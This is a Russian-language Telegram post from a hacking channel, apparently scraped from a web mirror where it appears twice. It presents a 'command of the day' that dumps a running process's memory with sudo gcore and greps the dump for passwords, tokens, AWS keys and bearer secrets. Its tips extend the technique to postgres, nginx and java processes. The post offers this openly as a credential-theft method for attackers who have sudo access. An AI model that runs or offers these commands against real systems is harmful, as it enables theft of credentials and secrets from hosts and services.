HACKPROGLIB Telegram 4616
tgoop.com » United States » Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность » Telegram web » Post 4616
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
📌 Команда дня: дамп памяти с паролями

Иногда у вас есть доступ к sudo, но нет полноценного рута. В таких случаях можно попробовать вытащить секреты прямо из памяти процесса:


pidof ssh && sudo gcore -o dump $(pidof ssh)
strings dump.* | grep -i password


➡️ pidof ssh — получаем PID целевого процесса

➡️ sudo gcore -o dump — снимаем дамп памяти

➡️ strings ... | grep — вытаскиваем строки с паролями

💡 Можно найти: пароли, токены, ключи, строки подключения к базам и конфиденциальные переменные.

Лайфхаки:

— Меняй ssh на любой процесс, где потенциально может быть секрет (например, postgres, nginx, java)

— Можно заменить grep -i password на grep -Ei 'token|secret|aws|bearer'

— Работает без установки дополнительных утилит, только sudo и gcore (есть в gdb)

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3
www.tgoop.com/hackproglib/4616
1.27K views



tgoop.com/hackproglib/4616
Create:
Last Update:

📌 Команда дня: дамп памяти с паролями

Иногда у вас есть доступ к sudo, но нет полноценного рута. В таких случаях можно попробовать вытащить секреты прямо из памяти процесса:


pidof ssh && sudo gcore -o dump $(pidof ssh)
strings dump.* | grep -i password


➡️ pidof ssh — получаем PID целевого процесса

➡️ sudo gcore -o dump — снимаем дамп памяти

➡️ strings ... | grep — вытаскиваем строки с паролями

💡 Можно найти: пароли, токены, ключи, строки подключения к базам и конфиденциальные переменные.

Лайфхаки:

— Меняй ssh на любой процесс, где потенциально может быть секрет (например, postgres, nginx, java)

— Можно заменить grep -i password на grep -Ei 'token|secret|aws|bearer'

— Работает без установки дополнительных утилит, только sudo и gcore (есть в gdb)

🐸 Библиотека хакера

#буст

BY Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность


Share with your friend now:
tgoop.com/hackproglib/4616

View MORE
Open in Telegram


Telegram News

Date: |

Users are more open to new information on workdays rather than weekends. How to Create a Private or Public Channel on Telegram? So far, more than a dozen different members have contributed to the group, posting voice notes of themselves screaming, yelling, groaning, and wailing in various pitches and rhythms. ZDNET RECOMMENDS Ng, who had pleaded not guilty to all charges, had been detained for more than 20 months. His channel was said to have contained around 120 messages and photos that incited others to vandalise pro-government shops and commit criminal damage targeting police stations.
from us


📌 Команда дня: дамп памяти с паролями

 Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность TG
web: 4616
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность.Telegram web
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность Telegram TG Channel
Telegram Updated:
Telegram Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
FROM American